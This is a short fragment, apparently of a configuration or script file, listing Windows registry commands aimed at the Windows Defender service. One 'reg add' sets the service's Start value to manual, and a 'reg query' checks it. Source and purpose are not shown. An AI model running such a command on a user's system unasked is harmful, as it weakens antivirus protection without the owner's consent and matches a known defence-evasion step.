CloseProcesses: unlock: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinDefend reg: reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinDefend /v Start /t REG_DWORD /d 0x3 /f reg: reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinDefend